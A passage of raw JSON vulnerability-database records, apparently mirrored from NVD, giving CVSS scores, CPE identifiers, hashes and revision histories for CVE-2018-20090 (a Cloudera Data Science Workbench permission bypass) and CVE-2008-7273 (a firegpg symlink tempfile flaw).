"cpe:2.3:a:cloudera:data_science_workbench:1.4.2:*:*:*:*:*:*:*", "versionEndIncluding": "1.4.2", "versionStartIncluding": "1.4.0", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-20090"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, "cwe": ["CWE-276"], "description": "An issue was discovered in Cloudera Data Science Workbench (CDSW) 1.4.0 through 1.4.2. Authenticated users can bypass project permission checks and gain read-write access to any project folder.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-10-03T13:20:18", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T13:20:18", "rev": 2, "value": 3.6, "vector": "NONE"}}, "hash": "f33cb333d5d8a5a9c7f12dfb2a08c0eafb913b208be3b53c6b86533789127f35", "hashmap": [{"hash": "f0b6cd1cb96fa625569929adf2ce275a", "key": "cvss3"}, {"hash": "6815699e6a776bb64460c7885bc789d7", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "fb07d3882bbb1c3f8e818bbd67fad422", "key": "cwe"}, {"hash": "0a0012f00a5c6a048309fa954a2816a2", "key": "modified"}, {"hash": "f50d423ad0f7953802c91abc24316354", "key": "cpeConfiguration"}, {"hash": "c615c5f44e2f71f10f8cca4a91b21be3", "key": "href"}, {"hash": "b5ef62c5c54f1070a854f021b7bee054", "key": "cpe"}, {"hash": "7e92dbc80227bea04e7e0d4eea3a7b86", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "b3158e5cd669fc65a7aabf14da33e71a", "key": "references"}, {"hash": "5c457d787b1406570ac95c03aae2c7ca", "key": "cpe23"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "e39687d2455aca6cad37fdbf402d3d9d", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "c86d85c9ccbc2ae7ec0076167c525754", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "de2a1fd5b98672b66b901b35cdf8ecb2", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20090", "id": "CVE-2018-20090", "lastseen": "2020-10-03T13:20:18", "modified": "2019-12-12T15:10:00", "objectVersion": "1.3", "published": "2019-11-26T16:15:00", "references": ["https://docs.cloudera.com/documentation/other/security-bulletins/topics/Security-Bulletin.html#TSB-351"], "reporter": "cve@mitre.org", "title": "CVE-2018-20090", "type": "cve", "viewCount": 3}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-10-03T13:20:18"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "cloudera:data_science_workbench", "name": "cloudera data science workbench", "operator": "le", "version": "1.4.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:cloudera:data_science_workbench:1.4.2"], "cpe23": ["cpe:2.3:a:cloudera:data_science_workbench:1.4.2:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:cloudera:data_science_workbench:1.4.2:*:*:*:*:*:*:*", "versionEndIncluding": "1.4.2", "versionStartIncluding": "1.4.0", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-20090"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, "cwe": ["CWE-276"], "description": "An issue was discovered in Cloudera Data Science Workbench (CDSW) 1.4.0 through 1.4.2. Authenticated users can bypass project permission checks and gain read-write access to any project folder.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-12-09T20:25:40", "references": [], "rev": 2}, "score": {"modified": "2020-12-09T20:25:40", "rev": 2, "value": 3.6, "vector": "NONE"}}, "extraReferences": [], "hash": "4fb991a8d3d4ffece48396e671aee3a9af3dd34e7bec1abff94fcdd01a190e13", "hashmap": [{"hash": "f0b6cd1cb96fa625569929adf2ce275a", "key": "cvss3"}, {"hash": "6815699e6a776bb64460c7885bc789d7", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "fb07d3882bbb1c3f8e818bbd67fad422", "key": "cwe"}, {"hash": "0a0012f00a5c6a048309fa954a2816a2", "key": "modified"}, {"hash": "f50d423ad0f7953802c91abc24316354", "key": "cpeConfiguration"}, {"hash": "c615c5f44e2f71f10f8cca4a91b21be3", "key": "href"}, {"hash": "b5ef62c5c54f1070a854f021b7bee054", "key": "cpe"}, {"hash": "7e92dbc80227bea04e7e0d4eea3a7b86", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "b3158e5cd669fc65a7aabf14da33e71a", "key": "references"}, {"hash": "5c457d787b1406570ac95c03aae2c7ca", "key": "cpe23"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "e39687d2455aca6cad37fdbf402d3d9d", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "c86d85c9ccbc2ae7ec0076167c525754", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "de2a1fd5b98672b66b901b35cdf8ecb2", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20090", "id": "CVE-2018-20090", "lastseen": "2020-12-09T20:25:40", "modified": "2019-12-12T15:10:00", "objectVersion": "1.3", "published": "2019-11-26T16:15:00", "references": ["https://docs.cloudera.com/documentation/other/security-bulletins/topics/Security-Bulletin.html#TSB-351"], "reporter": "cve@mitre.org", "title": "CVE-2018-20090", "type": "cve", "viewCount": 3}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-12-09T20:25:40"}], "edition": 8, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "de2a1fd5b98672b66b901b35cdf8ecb2"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "b5ef62c5c54f1070a854f021b7bee054"}, {"key": "cpe23", "hash": "5c457d787b1406570ac95c03aae2c7ca"}, {"key": "cpeConfiguration", "hash": "9b8520942d190552abb19506aa0a6d18"}, {"key": "cvelist", "hash": "6815699e6a776bb64460c7885bc789d7"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "f0b6cd1cb96fa625569929adf2ce275a"}, {"key": "cwe", "hash": "fb07d3882bbb1c3f8e818bbd67fad422"}, {"key": "description", "hash": "e39687d2455aca6cad37fdbf402d3d9d"}, {"key": "extraReferences", "hash": "c74cb3b4ad9747543c4343004196c086"}, {"key": "href", "hash": "c615c5f44e2f71f10f8cca4a91b21be3"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "0a0012f00a5c6a048309fa954a2816a2"}, {"key": "published", "hash": "c86d85c9ccbc2ae7ec0076167c525754"}, {"key": "references", "hash": "b3158e5cd669fc65a7aabf14da33e71a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "7e92dbc80227bea04e7e0d4eea3a7b86"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "7d8a26e95bcbc78c57bdef08ed3a2e4a61c54015d177e4be6fa725c1e389ba05", "viewCount": 7, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-23T00:24:26", "rev": 2}, "score": {"value": 3.6, "vector": "NONE", "modified": "2021-04-23T00:24:26", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:cloudera:data_science_workbench:1.4.2"], "affectedSoftware": [{"cpeName": "cloudera:data_science_workbench", "name": "cloudera data science workbench", "operator": "le", "version": "1.4.2"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, "cpe23": ["cpe:2.3:a:cloudera:data_science_workbench:1.4.2:*:*:*:*:*:*:*"], "cwe": ["CWE-276"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:cloudera:data_science_workbench:1.4.2:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.4.2", "versionStartIncluding": "1.4.0", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://docs.cloudera.com/documentation/other/security-bulletins/topics/Security-Bulletin.html#TSB-351", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://docs.cloudera.com/documentation/other/security-bulletins/topics/Security-Bulletin.html#TSB-351"}], "immutableFields": []}, {"id": "CVE-2008-7273", "bulletinFamily": "NVD", "title": "CVE-2008-7273", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "published": "2019-11-18T22:15:00", "modified": "2019-11-20T15:56:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "cvelist": ["CVE-2008-7273"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedSoftware": [{"name": "getfiregpg iceweasel-firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:iceweasel-firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-12-18T13:57:06", "references": [], "rev": 2}, "score": {"modified": "2019-12-18T13:57:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "d61e8c253c1f5d35ed5977532afcfe58d323a03057be4323e8c19bd7bed39d26", "hashmap": [{"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "3e1e24cf5fed13b85f5534cb239a1044", "key": "cpe"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4464888dd8ea79b7344278e86594f061", "key": "affectedSoftware"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2019-12-18T13:57:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2019-12-18T13:57:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "557fd4cb813bf4897b5fdca93f953d2fe22dd9fed46f9a924ed2d03719983a4f", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-09-21T13:59:22", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "enchantments": {"dependencies": {"modified": "2020-12-09T19:28:28", "references": [], "rev": 2}, "score": {"modified": "2020-12-09T19:28:28", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [], "hash": "3f2537e658f4240fe6f7df8e451ce685d2ca8ba79fbda529c1842e690c507e37", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-12-09T19:28:28", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 76}, "differentElements": ["extraReferences"], "edition": 7, "lastseen": "2020-12-09T19:28:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T11:51:06", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T11:51:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "3f49259ae0555553bcbf3433a53f5984d6de287f6d865e78b449bda3b88b8ea7", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-10-03T11:51:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 72}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-10-03T11:51:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", 